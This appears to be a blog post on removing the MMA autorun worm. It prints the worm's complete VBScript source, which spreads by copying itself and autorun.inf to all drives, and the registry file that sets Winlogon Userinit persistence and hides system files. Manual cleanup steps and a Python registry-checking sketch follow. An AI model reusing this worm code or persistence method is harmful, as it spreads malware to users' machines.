The most famous virus doing the rounds these days is this one: MMA.
It mainly has 4 files along with it:
1. mma.vbs (the source code of this virus)
2. mma.bat (the bat file which executes)
3. A war file named mma.
4. The autorun file (the obvious one)
Following is the source code of the MMA virus:
'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net
on error resume next
Set WshShell =CreateObject("WScript.Shell")
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\mma.vbs" then
isdir=true
else
a=WshShell.Run("mma.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("mma.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\mma.*",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
else
Of.CopyFile "mma.*",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
end if
a=WshShell.Run("mma.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("mma.bat - "&dir ,0,True)
Of.CopyFile "mma.*",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
a=WshShell.Run("mma.bat + "&dir ,0,True)
end if
next
How does it work?
When you double-click any drive and it does not open, and right-clicking it does not show an Open or Explore option but shows something else, the first thing you have to do is type the drive name followed by a colon (:) in the address bar.
Once the drive is open, go to Tools -> Folder Options -> view hidden files and folders -> uncheck "Hide operating system files", and click OK.
Now you can see all the hidden files as well. If you find files named mma, your PC is infected with it.
Steps to remove the MMA virus:
What you have to do is simple:
Step 1:
Stop the process named WScript.exe from your Task Manager.
Step 2:
Remove all the mma virus files. By the way, I forgot to mention that it also has a registry file.
Before deleting that mma.reg file, right-click it -> Edit. Now save it as a .txt file.
Now delete all the mma files from all drives. To open a drive, type the drive name followed by a colon (:) in the address bar and press Enter.
Step 3:
Using the text file that you saved, open the registry and go to the key listed in it. There will be one entry in Userinit. Be sure that you remove only the WScript entry from it, because if you delete the key as a whole your PC might not start. To remove just that entry,
right-click on the key -> Modify. Now remove just the WScript entry.
The second key present in the mma.reg file can be deleted fully.
Step 4:
Just restart Explorer. Your PC is now free from MMA.
Code of the registry file:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
Removing from the registry:
Edit the first key and remove only the reference to mma.bat. BE CAREFUL THAT YOU DON'T DELETE THIS KEY, ELSE YOU WON'T BE ABLE TO RUN XP.
You can delete the second key safely.
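The check from Step 3, as an added example that is not part of the original post: it parses the text saved from mma.reg and works out what the Userinit value should look like once only the worm's entry is removed. The sample text is constructed from the listing above, and the names `WORM_NAMES`, `parse_reg`, `clean_userinit` and `review` are hypothetical helpers chosen for this sketch.

```python
import re

# Constructed sample: the two keys of mma.reg as listed in this post.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
'''

# Assumption: any Userinit entry containing one of these names belongs to the worm.
WORM_NAMES = ("mma.bat", "mma.vbs", "wscript")

def parse_reg(text):
    """Return {key_path: {value_name: raw_value}} from exported .reg text."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        key = re.fullmatch(r"\[(.+)\]", line)
        value = re.fullmatch(r'"([^"]+)"=(.*)', line)
        if key:
            current = keys.setdefault(key.group(1), {})
        elif value and current is not None:
            current[value.group(1)] = value.group(2)
    return keys

def clean_userinit(raw):
    """Split the comma-separated Userinit list and drop only the worm entries."""
    text = raw.strip('"').replace("\\\\", "\\")  # .reg files escape backslashes
    entries = [e.strip() for e in text.split(",") if e.strip()]
    kept = [e for e in entries if not any(n in e.lower() for n in WORM_NAMES)]
    removed = [e for e in entries if e not in kept]
    return ",".join(kept), removed

def review(text):
    """List the manual actions the removal steps call for, one tuple per finding."""
    findings = []
    for key, values in parse_reg(text).items():
        if key.lower().endswith(r"\winlogon") and "Userinit" in values:
            cleaned, removed = clean_userinit(values["Userinit"])
            if removed:  # edit the value, never delete the Winlogon key
                findings.append(("edit Userinit", key, cleaned, removed))
        if values.get("ShowSuperHidden", "").lower() == "dword:00000000":
            # 0 keeps protected operating system files hidden in Explorer
            findings.append(("hidden OS files forced off", key, None, []))
    return findings
```

Calling `review()` on the saved text returns one finding per key; the third field of the Userinit finding is the value to leave in place after the edit.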